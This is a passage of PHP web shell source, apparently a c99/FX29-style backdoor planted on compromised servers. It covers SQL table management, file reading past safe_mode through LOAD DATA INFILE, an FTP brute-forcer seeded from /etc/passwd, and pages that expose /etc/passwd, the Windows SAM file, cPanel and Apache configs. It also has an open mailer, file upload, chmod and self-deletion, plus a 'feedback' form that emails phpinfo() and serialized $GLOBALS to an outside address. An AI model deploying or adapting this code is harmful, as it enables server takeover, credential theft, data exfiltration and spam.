value=\"Confirm\"></form>";}}if($sql_tbl_act=="browse"){$sql_tbl_ls=abs($sql_tbl_ls);$sql_tbl_le=abs($sql_tbl_le);echo "<hr size=\"1\" noshade>";echo "<img src=\"".$surl."act=img&img=multipage\" alt=\"Pages\"> ";$b=0 ;for($i=0 ;$i<$numpages;$i++){if(($i*$perpage!=$sql_tbl_ls) or ($i*$perpage+$perpage!=$sql_tbl_le)){echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}echo $i;if(($i*$perpage!=$sql_tbl_ls) or ($i*$perpage+$perpage!=$sql_tbl_le)){echo "</u></a>";}if(($i/30 ==round($i/30 )) and ($i>0 )){echo "<br>";}else {echo " ";}}if($i==0 ){echo "empty";}echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";echo "<br><form method=\"post\">\n";echo "<table><tr>";echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";for($i=0 ;$i<mysql_num_fields($result);$i++){$v=mysql_field_name($result,$i);if($e[0 ]=="a"){$s="d";$m="asc";}else {$s="a";$m="desc";}echo "<td>";if(empty($e[0 ])){$e[0 ]="a";}if(@$e[1 ]!=$v){echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0 ]."%20".$v."\"><b>".$v."</b></a>";}else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}echo "</td>";}echo "<td><font color=\"green\"><b>Action</b></font></td>";echo "</tr>";while($row=mysql_fetch_array($result,MYSQL_ASSOC)){echo "<tr>";$w="";$i=0 ;foreach($row as $k=>$v){$name=mysql_field_name($result,$i);$w.=" `".$name."` = '".addslashes($v)."' AND";$i++;}if(count($row)>0 ){$w=substr($w,0 ,strlen($w)-3 );}echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";$i=0 ;foreach($row as $k=>$v){$v=htmlspecialchars($v);if($v==""){$v="<font color=\"green\">NULL</font>";}echo "<td>".$v."</td>";$i++;}echo "<td>";echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a> ";echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";echo "</td>";echo "</tr>";}mysql_free_result($result);echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" alt=\" ^ \"><select name=\"sql_act\">";echo "<option value=\"\">With selected:</option>";echo "<option value=\"deleterow\">Delete</option>";echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";}}else {$result=mysql_query("SHOW TABLE STATUS",$sql_sock);if(!$result){echo mysql_smarterror();}else { ?>
	<form method="post">
	<table>
		<tr><th><input type="checkbox" name="boxtbl_all" value="1"></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>
<? $i=0 ;$tsize=$trows=0 ;while($row=mysql_fetch_array($result,MYSQL_ASSOC)){$tsize+=$row["Data_length"];$trows+=$row["Rows"];$size=view_size($row["Data_length"]); ?>
		<tr>
			<td><input type="checkbox" name="boxtbl[]" value="<? echo $row["Name"]; ?>"></td>
			<td><a href="<? echo $sql_surl; ?>sql_tbl=<? echo urlencode($row["Name"]); ?>"><b><? echo $row["Name"]; ?></b></a></td>
			<td><? echo $row["Rows"]; ?></td><td><? echo $row["Engine"]; ?></td><td><? echo $row["Create_time"]; ?></td><td><? echo $row["Update_time"]; ?></td><td><? echo $size; ?></td>
			<td><a href="<? echo $sql_surl; ?>sql_act=query&sql_query=<? echo urlencode("DELETE FROM `".$row["Name"]."`"); ?>">Empty</a>&nbsp;<a href="<? echo $sql_surl; ?>sql_act=query&sql_query=<? echo urlencode("DROP TABLE `".$row["Name"]."`"); ?>">Drop</a>&nbsp;<a href="<? echo $sql_surl; ?>sql_tbl_act=insert&sql_tbl=<? echo $row["Name"]; ?>">Insert</a></td>
		</tr>
<? $i++;}echo "\t\t<tr>\n"."\t\t<th>+</th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n"; ?>
		</tr>
	</table>
	<div align="right">
	<select name="sql_act">
		<option value="">With selected:</option>
		<option value="tbldrop">Drop</option>
		<option value="tblempty">Empty</option>";
		<option value="tbldump">Dump</option>";
		<option value="tblcheck">Check table</option>";
		<option value="tbloptimize">Optimize table</option>";
		<option value="tblrepair">Repair table</option>";
		<option value="tblanalyze">Analyze table</option>";
	</select>
	<input type="submit" value="Confirm">
	</div>
	</form>
<? mysql_free_result($result);}}}}}else {$acts=array("","newdb","serverstatus","servervars","processes","getfile");if(in_array($sql_act,$acts)){ ?>
	<table>
		<tr>
		<td><b>Create new DB:</b>
		<form action="<? echo $surl; ?>">
			<input type="hidden" name="act" value="sql">
			<input type="hidden" name="sql_act" value="newdb">
			<input type="hidden" name="sql_login" value="<? echo htmlspecialchars($sql_login); ?>">
			<input type="hidden" name="sql_passwd" value="<? echo htmlspecialchars($sql_passwd); ?>">
			<input type="hidden" name="sql_server" value="<? echo htmlspecialchars($sql_server); ?>">
			<input type="hidden" name="sql_port" value="<? echo htmlspecialchars($sql_port); ?>">
			<input type="text" name="sql_newdb" size="20">
			<input type="submit" value="Create">
		</form>
		</td>
		<td><b>View File:</b>
		<form action="<? echo $surl; ?>">
			<input type="hidden" name="act" value="sql">
			<input type="hidden" name="sql_act" value="getfile">
			<input type="hidden" name="sql_login" value="<? echo htmlspecialchars($sql_login); ?>">
			<input type="hidden" name="sql_passwd" value="<? echo htmlspecialchars($sql_passwd); ?>">
			<input type="hidden" name="sql_server" value="<? echo htmlspecialchars($sql_server); ?>">
			<input type="hidden" name="sql_port" value="<? echo htmlspecialchars($sql_port); ?>">
			<input type="text" name="sql_getfile" size="30" value="<? echo htmlspecialchars($sql_getfile); ?>">
			<input type="submit" value="Get">
		</form>
		</td>
		</tr>
	</table>
<? }if(!empty($sql_act)){echo "<hr size=\"1\" noshade>";if($sql_act=="newdb"){echo "<b>";if((mysql_create_db($sql_newdb)) and (!empty($sql_newdb))){echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}}if($sql_act=="serverstatus"){$result=mysql_query("SHOW STATUS",$sql_sock);echo "<center><b>Server-status variables:</b><br><br>";echo "<table><td><b>Name</b></td><td><b>Value</b></td></tr>";while($row=mysql_fetch_array($result,MYSQL_NUM)){echo "<tr><td>".$row[0 ]."</td><td>".$row[1 ]."</td></tr>";}echo "</table></center>";mysql_free_result($result);}if($sql_act=="servervars"){$result=mysql_query("SHOW VARIABLES",$sql_sock);echo "<center><b>Server variables:</b><br><br>";echo "<table><td><b>Name</b></td><td><b>Value</b></td></tr>";while($row=mysql_fetch_array($result,MYSQL_NUM)){echo "<tr><td>".$row[0 ]."</td><td>".$row[1 ]."</td></tr>";}echo "</table>";mysql_free_result($result);}if($sql_act=="processes"){if(!empty($kill)){$query="KILL ".$kill.";";$result=mysql_query($query,$sql_sock);echo "<b>Process #".$kill." was killed.</b>";}$result=mysql_query("SHOW PROCESSLIST",$sql_sock);echo "<center><b>Processes:</b><br><br>";echo "<table><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";while($row=mysql_fetch_array($result,MYSQL_NUM)){echo "<tr><td>".$row[0 ]."</td><td>".$row[1 ]."</td><td>".$row[2 ]."</td><td>".$row[3 ]."</td><td>".$row[4 ]."</td><td>".$row[5 ]."</td><td>".$row[6 ]."</td><td>".$row[7 ]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0 ]."\"><u>Kill</u></a></td></tr>";}echo "</table>";mysql_free_result($result);}if($sql_act=="getfile"){$tmpdb=$sql_login."_tmpdb";$select=mysql_select_db($tmpdb);if(!$select){mysql_create_db($tmpdb);$select=mysql_select_db($tmpdb);$created=!!$select;}if($select){$created=FALSE;mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");$result=mysql_query("SELECT * FROM tmp_file;");if(!$result){echo "<b>Error in reading file (permision denied)!</b>";}else {for($i=0 ;$i<mysql_num_fields($result);$i++){$name=mysql_field_name($result,$i);}$f="";while($row=mysql_fetch_array($result,MYSQL_ASSOC)){$f.=join("\r\n",$row);}if(empty($f)){echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}mysql_free_result($result);mysql_query("DROP TABLE tmp_file;");}}mysql_drop_db($tmpdb);}}}} ?>
	</td>
	</tr>
<? if($sql_sock){$affected=@mysql_affected_rows($sql_sock);if((!is_numeric($affected)) or ($affected<0 )){$affected=0 ;}echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";} ?>

</table>
<!-- End of SQL Manager -->

<? }if($act=="ftpquickbrute"){bar_header(".: Ftp Quick Brute :.");echo "<table>\n";echo "<tr><td>";if(!empty($submit)){if(!is_numeric($fqb_lenght)){$fqb_lenght=$nixpwdperpage;}$fp=fopen("/etc/passwd","r");if(!$fp){echo "Can't get /etc/passwd for password-list.";}else {if($fqb_logging){if($fqb_logfile){$fqb_logfp=fopen($fqb_logfile,"w");}else {$fqb_logfp=FALSE;}$fqb_log="FTP Quick Brute (".sh_name().") started at ".date("d.m.Y H:i:s")."\r\n\r\n";if($fqb_logfile){fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}}@ob_flush();$i=$success=0 ;$ftpquick_st=getmicrotime();while(!feof($fp)){$str=explode(":",fgets($fp,2048 ));if(fx29ftpbrutecheck("localhost",21 ,1 ,$str[0 ],$str[0 ],$str[6 ],$fqb_onlywithsh)){echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0 ]."\" and password \"".$str[0 ]."\"</b><br>";$fqb_log.="Connected to ".getenv("SERVER_NAME")." with login \"".$str[0 ]."\" and password \"".$str[0 ]."\", at ".date("d.m.Y H:i:s")."\r\n";if($fqb_logfp){fseek($fqb_logfp,0 );fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}$success++;ob_flush();}if($i>$fqb_lenght){break;}$i++;}if($success==0 ){echo "No success. connections!";$fqb_log.="No success. connections!\r\n";}$ftpquick_t=round(getmicrotime()-$ftpquick_st,4 );echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font class=on><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2 )."<br>";$fqb_log.="\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2 )."\r\n";if($fqb_logfp){fseek($fqb_logfp,0 );fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}if($fqb_logemail){@mail($fqb_logemail,"".sh_name()." report",$fqb_log);}fclose($fqb_logfp);}}echo "</td></tr></table></center>";}if($act=="security"){bar_header(".: Server Security Information :."); ?>

<table class="contents">
	<tr><td>Open Base Dir</td><td><? echo $hopenbasedir; ?></td></tr>
	<td>Password File</td><td>
<? if(!is_windows()){if($nixpasswd){if($nixpasswd==1 )$nixpasswd=0 ;if(!is_numeric($nixpwd_s))$nixpwd_s=0 ;if(!is_numeric($nixpwd_e))$nixpwd_e=$nixpwdperpage; ?>
	*nix /etc/passwd:<br>
	<form name="f_pwd" action="<? echo $surl; ?>">
		<input type="hidden" name="act" value="security">
		<input type="hidden" name="nixpasswd" value="1">
		<b>From:</b>
		<input type="text" name="nixpwd_s" value="<? echo $nixpwd_s; ?>">
		<b>To:</b>
		<input type="text" name="nixpwd_e" value="<? $nixpwd_e; ?>">
		<input type="submit" value="View">
	</form><br>
<? $i=$nixpwd_s;while($i<$nixpwd_e){$uid=posix_getpwuid($i);if($uid){$uid["dir"]="<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";echo "\t\t".join(":",$uid)."<br>\n";}$i++;}}else {echo "\t<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>View /etc/passwd</b></a>\n";}}else {$v=$_SERVER["WINDIR"].'\repair\sam';if(file_get_contents($v)){echo "\t<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>\n";}} ?>
	</td></tr>
	<tr><td>Config Files</td><td>
<? if(!is_windows()){$v=array(array("User Domains","/etc/userdomains"),array("Cpanel Config","/var/cpanel/accounting.log"),array("Apache Config","/usr/local/apache/conf/httpd.conf"),array("Apache Config","/etc/httpd.conf"),array("Syslog Config","/etc/syslog.conf"),array("Message of The Day","/etc/motd"),array("Hosts","/etc/hosts"));$sep="/";}else {$windir=$_SERVER["WINDIR"];$etcdir=$windir.'\system32\drivers\etc\\';$v=array(array("Hosts",$etcdir."hosts"),array("Local Network Map",$etcdir."networks"),array("LM Hosts",$etcdir."lmhosts.sam"),);$sep="\\";}foreach($v as $sec_arr){$sec_f=substr(strrchr($sec_arr[1 ],$sep),1 );$sec_d=rtrim($sec_arr[1 ],$sec_f);$sec_full=$sec_d.$sec_f;$sec_d=rtrim($sec_d,$sep);if(file_get_contents($sec_full)){echo "\t[ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0 ]."</b></a> ]\n";}} ?>
	</td></tr>
<? function dispsecinfo($name,$value){if(!empty($value)){echo "\t<tr><td>".$name."</td><td>\n"."<pre>".wordwrap($value,100 )."</pre>\n"."\t</td></tr>\n";}}if(!is_windows()){dispsecinfo("OS Version",fx29exec("cat /proc/version"));dispsecinfo("Kernel Version",fx29exec("sysctl -a | grep version"));dispsecinfo("Distrib Name",fx29exec("cat /etc/issue.net"));dispsecinfo("Distrib Name (2)",fx29exec("cat /etc/*-realise"));dispsecinfo("CPU Info",fx29exec("cat /proc/cpuinfo"));dispsecinfo("RAM",fx29exec("free -m"));dispsecinfo("HDD Space",fx29exec("df -h"));dispsecinfo("List of Attributes",fx29exec("lsattr -a"));dispsecinfo("Mount Options",fx29exec("cat /etc/fstab"));dispsecinfo("lynx installed?",fx29exec("which lynx"));dispsecinfo("links installed?",fx29exec("which links"));dispsecinfo("GET installed?",fx29exec("which GET"));dispsecinfo("Where is Apache?",fx29exec("whereis apache"));dispsecinfo("Where is perl?",fx29exec("whereis perl"));dispsecinfo("Locate proftpd.conf",fx29exec("locate proftpd.conf"));dispsecinfo("Locate httpd.conf",fx29exec("locate httpd.conf"));dispsecinfo("Locate my.conf",fx29exec("locate my.conf"));dispsecinfo("Locate psybnc.conf",fx29exec("locate psybnc.conf"));}else {dispsecinfo("OS Version",fx29exec("ver"));dispsecinfo("Account Settings",fx29exec("net accounts"));dispsecinfo("User Accounts",fx29exec("net user"));}echo "</table>\n";}if($act=="mkfile"){if($mkfile!=$d){if($overwrite==0 ){if(file_exists($mkfile)){echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile);}}else {if(!fopen($mkfile,"w")){echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile);}else {$act="f";$d=dirname($mkfile);if(substr($d,-1 )!=DIRECTORY_SEPARATOR){$d.=DIRECTORY_SEPARATOR;}$f=basename($mkfile);}}}else {disp_error("Enter filename!");}}if($act=="encoder"){if(!isset($encoder_input))$encoder_input="";bar_header(".: Encoder :."); ?>
<script language="javascript">
function set_encoder_input(text) {
  document.forms.encoder.input.value = text;
}
</script>

<form name="encoder" action="<? echo $surl; ?>" method="post">
	<input type="hidden" name="act" value="encoder">
	<table class="contents">
		<tr><td colspan="2">Input:</td><td><textarea name="encoder_input" id="input" cols="70" rows="5"><? echo @htmlspecialchars($encoder_input); ?></textarea><br>
		<input type="submit" value="Calculate">
		</td></tr>
		<tr><td rowspan="4">Hashes:</td>
<? foreach(array("md5","crypt","sha1","crc32") as $v){ ?>
		<td><? echo $v; ?>:</td><td><input type="text" size="50" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<? echo $v($encoder_input); ?>" readonly>
		</td></tr>
		<tr>
<? } ?>
		</tr>
		<tr><td rowspan=2>Url:</td><td>urlencode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<? echo urlencode($encoder_input); ?>" readonly></td></tr>
		<tr><td>urldecode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<? echo htmlspecialchars(urldecode($encoder_input)); ?>" readonly></td></tr>
		<tr><td rowspan=2>Base64:</td><td>base64_encode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<? echo base64_encode($encoder_input); ?>" readonly></td></tr>
		<tr><td>base64_decode:</td>
		<td>
<? if(base64_encode(base64_decode($encoder_input))!=$encoder_input){ ?>
		<input type="text" size="35" value="Failed!" disabled readonly>
<? }else {$debase64=base64_decode($encoder_input);$debase64=str_replace("\0","[0]",$debase64);$a=explode("\r\n",$debase64);$rows=count($a);$debase64=htmlspecialchars($debase64);if($rows==1 ){echo "\t\t<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}else {$rows++;echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>\n";}echo "\t\t</td></tr>\n"."\t\t<tr><td>Base convertations:</td><td>dec2hex</td><td>"."<input type=\"text\" size=\"35\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"\"";$c=strlen($encoder_input);for($i=0 ;$i<$c;$i++){$hex=dechex(ord($encoder_input[$i]));if($encoder_input[$i]=="&"){echo $encoder_input[$i];}elseif($encoder_input[$i]!="\\"){echo "%".$hex;}}echo "\" readonly>\n"; ?>
		</td></tr>
	</table>
</form>
<? }if($act=="fsbuff"){$arr_copy=$sess_data["copy"];$arr_cut=$sess_data["cut"];$arr=array_merge($arr_copy,$arr_cut);if(count($arr)==0 ){echo "<h2><center>Buffer is empty!</center></h2>";}else {$fx_infohead="File-System Buffer";$ls_arr=$arr;$disp_fullpath=TRUE;$act="ls";}}if($act=="selfremove"){ ?>
<div class="barheader">
	.: SELF KILL :.
	<hr size="1" noshade>

<? if((@$submit==@$rndcode) && (@$submit!="")){if(unlink(__FILE__)){@ob_clean();echo "Thanks for using ".sh_name()."!";fx29shexit();}else {disp_error("Can't delete ".__FILE__."!");}}else {if(!empty($rndcode)){disp_error("Error: Incorrect confirmation code!");}$rnd=rand(0 ,9 ).rand(0 ,9 ).rand(0 ,9 ); ?>
<form name="f_killshell" action="<? echo $surl; ?>">
	<input type="hidden" name="act" value="selfremove">
	<input type="hidden" name="rndcode" value="<? echo $rnd; ?>">
	Are you sure want to remove this shell ?<br>
	<? disp_error(__FILE__); ?>
	<br>For confirmation, enter "<? echo $rnd; ?>"<br>
	<input type="text" name="submit"><br>
	<input type="submit" value="KILL">
</form>
</div>
<? }}if($act=="feedback"){$suppmail="q@w.ru";if(!empty($submit)){$ticket=substr(md5(microtime()+rand(1 ,1000 )),0 ,6 );$body=sh_name()." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;if(!empty($fdbk_ref)){$tmp=@ob_get_contents();ob_clean();phpinfo();$phpinfo=base64_encode(ob_get_contents());ob_clean();echo $tmp;$body.="\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";}mail($suppmail,sh_name()." feedback #".$ticket,$body,"FROM: ".$suppmail);echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";}else {bar_header(".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :."); ?>

<form name="f_feedback" action="<? echo $surl; ?>" method="post">
	<input type="hidden" name="act" value="feedback">
	<table class="contents">
		<tr><th>Your name:</th><td><input type="text" name="fdbk_name" value="<? echo htmlspecialchars(@$fdbk_name); ?>"></td</tr>
		<tr><th>Your e-mail:</th><td><input type="text" name="fdbk_email" value="<? echo htmlspecialchars(@$fdbk_email); ?>"></td></tr>
		<tr><th>Message:</th><td><textarea name="fdbk_body" cols=80 rows=10><? echo htmlspecialchars(@$fdbk_body); ?></textarea>
		<input type="hidden" name="fdbk_ref" value="<? echo urlencode($HTTP_REFERER); ?>"><br>
		<input type="checkbox" name="fdbk_servinf" value="1" checked> Attach Server info (Recommended for bug-fix)</td></tr>
		<tr><td></td><td><input type="submit" name="submit" value="Send"></td></tr>
	</table>
</form>
<? }}if($act=="fxmailer"){bar_header(".: Mailer :.");if(!empty($submit)){$headers='To: '.$dest_email."\n";$headers.='From: '.$sender_name.' '.$sender_email."\n";if(mail($dest_email,$sender_subj,$sender_body,$headers)){echo "<center><b>Email sent to $dest_email!</b></center>";}else {disp_error("Can't send email!");}}else { ?>
<form name="f_mailer" action="<? echo $surl; ?>" method="post">
	<input type="hidden" name="act" value="fxmailer">
	<table class="contents">
		<tr><th>Your name:</th><td><input type="text" name="sender_name" value="<? echo @htmlspecialchars($sender_name); ?>"></td></tr>
		<tr><th>Your e-mail:</th><td><input type="text" name="sender_email" value="<? echo @htmlspecialchars($sender_email); ?>"></td></tr>
		<tr><th>To:</th><td><input type="text" name="dest_email" value="<? @htmlspecialchars($dest_email); ?>"></td></tr>
		<tr><th>Subject:</th><td><input size="70" type="text" name="sender_subj" value="<? echo @htmlspecialchars($sender_subj); ?>"></td></tr>
		<tr><th>Message:</th><td><textarea name="sender_body" cols="80" rows="10"><? echo @htmlspecialchars($sender_body); ?></textarea></td></tr>
		<tr><th></th><td><input type="submit" name="submit" value="Send"></td></tr>
	</table>
</form>
<? }}if($act=="search"){bar_header(".: Filesystem Search :.");if(empty($search_in)){$search_in=$d;}if(empty($search_name)){$search_name="(.*)";$search_name_regexp=1 ;}if(empty($search_text_wwo)){$search_text_regexp=0 ;}if(!empty($submit)){$found=array();$found_d=0 ;$found_f=0 ;$search_i_f=0 ;$search_i_d=0 ;$a=array("name"=>@$search_name,"name_regexp"=>@$search_name_regexp,"text"=>@$search_text,"text_regexp"=>@$search_text_regxp,"text_wwo"=>@$search_text_wwo,"text_cs"=>@$search_text_cs,"text_not"=>@$search_text_not);$searchtime=getmicrotime();$in=array_unique(explode(";",$search_in));foreach($in as $v){fx29fsearch($v);}$searchtime=round(getmicrotime()-$searchtime,4 );if(count($found)==0 ){echo "No files found!";}else {$ls_arr=$found;$disp_fullpath=TRUE;$act="ls";}} ?>
<form name="f_search" method="post">
	<input type="hidden" name="d" value="<? echo $dispd; ?>">
	<input type="hidden" name="act" value="<? echo $dspact; ?>">
	<table class="contents">
		<tr><th>File or folder Name:</th><td><input type="text" name="search_name" size="<? echo round(strlen($search_name)+25 ); ?>" value="<? echo htmlspecialchars($search_name); ?>"> <input type="checkbox" name="search_name_regexp" value="1" <? echo (@$search_name_regexp==1 ?" checked":""); ?>> Regular Expression</td></tr>
		<tr><th>Look in (Separate by ";"):</th><td><input type="text" name="search_in" size="<? echo round(strlen($search_in)+25 ); ?>" value="<? echo htmlspecialchars($search_in); ?>"></td></tr>
		<tr><th>A word or phrase in the file:</th><td><textarea name="search_text" cols="50" rows="5"><? echo htmlspecialchars(@$search_text); ?></textarea></td></tr>
		<tr><th></th><td>
			<input type="checkbox" name="search_text_regexp" value="1" <? echo (@$search_text_regexp==1 ?" checked":""); ?>> Regular Expression
			<input type="checkbox" name="search_text_wwo" value="1" <? echo (@$search_text_wwo==1 ?" checked":""); ?>> Whole words only
			<input type="checkbox" name="search_text_cs" value="1" <? echo (@$search_text_cs==1 ?" checked":""); ?>> Case sensitive
			<input type="checkbox" name="search_text_not" value="1" <? echo (@$search_text_not==1 ?" checked":""); ?>> Find files NOT containing the text
		</td></tr>
		<tr><th></th><td><input type="submit" name="submit" value="Search"></td></tr>
	</table>
</form>
<? if($act=="ls"){$dspact=$act;echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4 )." objects per second).</b>\n"."<hr size=\"1\" noshade>\n";}}if($act=="chmod"){$mode=fileperms($d.$f);if(!$mode){echo "<b>Change file-mode with error:</b> can't get current value.";}else {$form=TRUE;if($chmod_submit){$octet="0".base_convert(($chmod_o["r"]?1 :0 ).($chmod_o["w"]?1 :0 ).($chmod_o["x"]?1 :0 ).($chmod_g["r"]?1 :0 ).($chmod_g["w"]?1 :0 ).($chmod_g["x"]?1 :0 ).($chmod_w["r"]?1 :0 ).($chmod_w["w"]?1 :0 ).($chmod_w["x"]?1 :0 ),2 ,8 );if(chmod($d.$f,$octet)){$act="ls";$form=FALSE;$err="";}else {$err="Can't chmod to ".$octet.".";}}if($form){$perms=parse_perms($mode);echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4 ,4 ).")</b>\n"."<br>".($err?"<b>Error:</b> ".$err:"")."\n"."<form name=\"f_chmod\" action=\"".$surl."\" method=\"post\">\n"."<input type=hidden name=d value=\"".htmlspecialchars($d)."\">\n"."<input type=hidden name=f value=\"".htmlspecialchars($f)."\">\n"."<input type=hidden name=act value=chmod>\n"."<table><tr>\n"."<td><b>Owner</b><br><br>\n"."<input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br>\n"."<input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br>\n"."<input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"")."> eXecute</td>\n"."<td><b>Group</b><br><br>\n"."<input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br>\n"."<input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br>\n"."<input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"")."> eXecute</td>\n"."<td><b>World</b><br><br>\n"."<input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br>\n"."<input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br>\n"."<input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"")."> eXecute</td>\n"."</tr>\n"."<tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr>\n"."</table>\n"."</form>\n";}}}if($act=="upload"){$uploadmess="";$uploadpath=(isset($uploadpath))?str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath):$d;if(substr($uploadpath,-1 )!=DIRECTORY_SEPARATOR){$uploadpath.=DIRECTORY_SEPARATOR;}if(!empty($submit)){$uploadfile=$_FILES["uploadfile"];if(!empty($uploadfile["tmp_name"])){if(empty($uploadfilename)){$destin=$uploadfile["name"];}else {$destin=$userfilename;}if(!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)){$uploadmess.="<div class=errmsg>Error uploading file ".$uploadfile["name"]." (Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!</div>";}else {$uploadmess.="File uploaded successfully!<br>".$uploadpath.$destin;}}else {$uploadmess.="<div class=errmsg>No file to upload!</div>";}}echo 